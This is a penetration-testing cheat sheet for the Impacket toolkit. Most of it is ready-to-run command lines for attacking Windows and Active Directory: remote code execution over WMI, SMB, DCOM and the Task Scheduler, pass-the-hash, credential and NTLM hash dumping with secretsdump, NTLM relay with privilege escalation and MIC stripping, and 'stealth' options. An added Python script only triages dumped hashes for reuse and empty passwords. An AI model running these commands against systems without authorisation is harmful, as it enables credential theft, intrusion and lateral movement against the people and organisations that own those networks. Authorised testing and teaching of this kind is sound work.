Impacket

Impacket is a collection of Python scripts and libraries used for penetration testing and security assessments. It provides tools for working with network protocols, exploiting vulnerabilities, and performing post-exploitation tasks. Penetration testers utilize Impacket for tasks ranging from network reconnaissance and credential extraction to remote code execution and lateral movement within networks.
Navigation
  • Installation and Setup
  • Tools Overview
  • wmiexec.py – Remote Command Execution via WMI
  • psexec.py – Remote Execution Over SMB
  • smbexec.py – Execute Commands via SMB
  • dcomexec.py – Remote Execution via DCOM
  • atexec.py – Task Scheduler Execution
  • secretsdump.py – Extract Credentials and Hashes
  • rpcdump.py – Dump RPC Endpoints
  • samrdump.py – Enumerate SAM Accounts
  • ntlmrelayx.py – NTLM Relay Attacks
  • Performance Tuning and Stealth Mode
  • Best Practices

Installation and Setup

Install on Kali Linux

sudo apt update && sudo apt install impacket-scripts

Install on Debian/Ubuntu

sudo apt update && sudo apt install python3-impacket

Install via pipx (Recommended)

python3 -m pipx install impacket

Install from Source

git clone https://github.com/fortra/impacket.git
cd impacket
pip install .

Tools Overview

Impacket provides tools for interacting with Windows networking, SMB, Kerberos, Active Directory, and other protocols. I have listed and created a cheat sheet for the most common ones I use in penetration testing.

wmiexec.py – Remote Command Execution via WMI

wmiexec.py DOMAIN/USER:PASSWORD@TARGET                               #Execute command remotely via WMI
wmiexec.py -hashes :NTLM_HASH DOMAIN/USER@TARGET                     #Use NTLM Hash for Authentication
wmiexec.py -nooutput DOMAIN/USER:PASSWORD@TARGET                     #Suppress command output
wmiexec.py DOMAIN/USER@TARGET                                        #Omit the password to be prompted for it instead of passing it on the command line

psexec.py – Remote Execution Over SMB

psexec.py DOMAIN/USER:PASSWORD@TARGET                                #Execute commands via SMB Named Pipes
psexec.py -hashes :NTLM_HASH DOMAIN/USER@TARGET                      #Use NTLM Hash for Authentication
psexec.py -target-ip 10.1.1.1 DOMAIN/USER:PASSWORD@TARGET            #Specify Target IP
psexec.py -service-name CustomSvc DOMAIN/USER:PASSWORD@TARGET        #Customize Service Name

smbexec.py – Execute Commands via SMB

smbexec.py DOMAIN/USER:PASSWORD@TARGET                               #Execute commands interactively over SMB
smbexec.py -hashes :NTLM_HASH DOMAIN/USER@TARGET                     #Pass-the-Hash Execution
smbexec.py -share ADMIN$ DOMAIN/USER:PASSWORD@TARGET                 #Share used to collect command output (default C$)
smbexec.py -mode SERVER DOMAIN/USER:PASSWORD@TARGET                  #SERVER mode serves the output share from the local host (needs root); default is SHARE

dcomexec.py – Remote Execution via DCOM

dcomexec.py DOMAIN/USER:PASSWORD@TARGET                              #Execute commands over DCOM
dcomexec.py -hashes :NTLM_HASH DOMAIN/USER@TARGET                    #Pass-the-Hash Execution
dcomexec.py -object MMC20 DOMAIN/USER:PASSWORD@TARGET                #Use MMC20 DCOM Object

atexec.py – Task Scheduler Execution

atexec.py DOMAIN/USER:PASSWORD@TARGET "whoami"                       #Execute a command via the Task Scheduler (the command is a required argument)
atexec.py -hashes :NTLM_HASH DOMAIN/USER@TARGET "whoami"             #Use NTLM Hash for Authentication
atexec.py -debug DOMAIN/USER:PASSWORD@TARGET "whoami"                #Enable Debug Mode

secretsdump.py – Extract Credentials and Hashes

secretsdump.py DOMAIN/USER:PASSWORD@TARGET                           #Dump NTLM Hashes & Credentials
secretsdump.py -hashes :NTLM_HASH DOMAIN/USER@TARGET                 #Use Pass-the-Hash
secretsdump.py -just-dc-ntlm DOMAIN/USER:PASSWORD@TARGET             #Dump Only NTLM Hashes from DC
secretsdump.py -outputfile hashes.txt DOMAIN/USER:PASSWORD@TARGET    #Save Hashes to File
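
The hash lines secretsdump prints (and writes to the files that -outputfile creates, such as hashes.txt.ntds) use the pwdump layout user:rid:lmhash:nthash:::, with a DOMAIN\ prefix when the source is a domain controller. The Python below is an added example, not part of this cheat sheet or of Impacket: it parses that output and performs the triage a reviewer does on the result, flagging accounts with an empty password, accounts whose LM hash is still stored, and NT hashes shared by several accounts (the same password reused). The sample lines are constructed; only the two empty-password hash constants are real, well-known values.

```python
import re
from collections import defaultdict
from dataclasses import dataclass
from typing import Dict, List

# Well-known hash values of the empty password (public constants, not secrets).
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"

# One pwdump-style line as secretsdump writes it: [DOMAIN\]user:rid:lmhash:nthash:::
LINE_RE = re.compile(
    r"^(?:(?P<domain>[^\\:]+)\\)?(?P<user>[^:]+):(?P<rid>\d+):"
    r"(?P<lm>[0-9a-fA-F]{32}):(?P<nt>[0-9a-fA-F]{32}):::$"
)


@dataclass(frozen=True)
class Entry:
    domain: str
    user: str
    rid: int
    lm: str
    nt: str

    @property
    def name(self) -> str:
        return f"{self.domain}\\{self.user}" if self.domain else self.user

    @property
    def is_machine(self) -> bool:
        # Computer accounts end in '$' and carry random passwords; they only add noise here.
        return self.user.endswith("$")


def parse_secretsdump(text: str) -> List[Entry]:
    """Extract hash lines from secretsdump output; banner lines ('[*] ...')
    and anything malformed are skipped rather than raising."""
    entries: List[Entry] = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if m is None:
            continue
        entries.append(Entry(m["domain"] or "", m["user"], int(m["rid"]),
                             m["lm"].lower(), m["nt"].lower()))
    return entries


def triage(entries: List[Entry], skip_machine: bool = True) -> Dict[str, object]:
    """Flag the three findings a reviewer looks for first: empty passwords,
    LM hashes still being stored, and one NT hash shared by several accounts."""
    by_nt: Dict[str, List[str]] = defaultdict(list)
    empty: List[str] = []
    lm_present: List[str] = []
    for e in entries:
        if skip_machine and e.is_machine:
            continue
        if e.nt == EMPTY_NT:
            empty.append(e.name)
        if e.lm != EMPTY_LM:
            lm_present.append(e.name)
        by_nt[e.nt].append(e.name)
    shared = {h: users for h, users in by_nt.items()
              if len(users) > 1 and h != EMPTY_NT}
    return {"empty_password": empty, "lm_hash_present": lm_present,
            "shared_nt_hash": shared}


# Constructed sample in the format secretsdump emits; every hash value is
# made up except the two empty-password constants defined above.
SAMPLE = r"""[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
CORP\Administrator:500:aad3b435b51404eeaad3b435b51404ee:0123456789abcdef0123456789abcdef:::
CORP\Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
CORP\svc_backup:1105:aad3b435b51404eeaad3b435b51404ee:0123456789abcdef0123456789abcdef:::
CORP\legacyuser:1200:0123456789abcdef0123456789abcdef:fedcba9876543210fedcba9876543210:::
CORP\WS01$:1300:aad3b435b51404eeaad3b435b51404ee:00112233445566778899aabbccddeeff:::
[*] Cleaning up...
"""

if __name__ == "__main__":
    findings = triage(parse_secretsdump(SAMPLE))
    for kind, hits in findings.items():
        print(f"{kind}: {hits}")
```

Machine accounts are skipped by default because their passwords are random and rotated; pass skip_machine=False to include them. A shared NT hash is the finding worth chasing first, since one reused password across an administrator and a service account is a single point of compromise for both.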

rpcdump.py – Dump RPC Endpoints

rpcdump.py DOMAIN/USER:PASSWORD@TARGET                               #List Exposed RPC Endpoints
rpcdump.py -target-ip 10.1.1.1 DOMAIN/USER:PASSWORD@TARGET           #Specify Target IP

samrdump.py – Enumerate SAM Accounts

samrdump.py DOMAIN/USER:PASSWORD@TARGET                              #Enumerate SAM User Accounts
samrdump.py -hashes :NTLM_HASH DOMAIN/USER@TARGET                    #Use NTLM Hash for Authentication

ntlmrelayx.py – NTLM Relay Attacks

ntlmrelayx.py -t TARGET                                              #Relay NTLM Authentication to Target
ntlmrelayx.py -smb2support -t TARGET                                 #Enable SMBv2 Support
ntlmrelayx.py -t ldap://DC_IP --delegate-access                      #Relay to LDAP for Privilege Escalation
ntlmrelayx.py --remove-mic -t TARGET                                 #Strip the MIC from the relayed NTLM authentication (the "Drop the MIC" flaw)

Performance Tuning and Stealth Mode

wmiexec.py -silentcommand DOMAIN/USER:PASSWORD@TARGET                #Run the command without going through cmd.exe (no output is returned)
secretsdump.py -k -no-pass DOMAIN/USER@TARGET                        #Authenticate with the Kerberos ticket in KRB5CCNAME and do not prompt for a password
ntlmrelayx.py --no-wcf-server -debug -t TARGET                       #Do not start the WCF relay server; enable debug output
psexec.py -remote-binary-name svc.exe DOMAIN/USER:PASSWORD@TARGET    #Name of the service binary uploaded to the target (default is random)

Best Practices

secretsdump.py -just-dc-ntlm DOMAIN/USER:PASSWORD@TARGET             #Extract Only NTLM Hashes
ntlmrelayx.py -t ldap://DC_IP --delegate-access                      #Relay NTLM to LDAP for Privilege Escalation
wmiexec.py -nooutput DOMAIN/USER:PASSWORD@TARGET                     #Suppress Command Output
atexec.py DOMAIN/USER:PASSWORD@TARGET "whoami"                       #Use the Task Scheduler (atexec) instead of a service for execution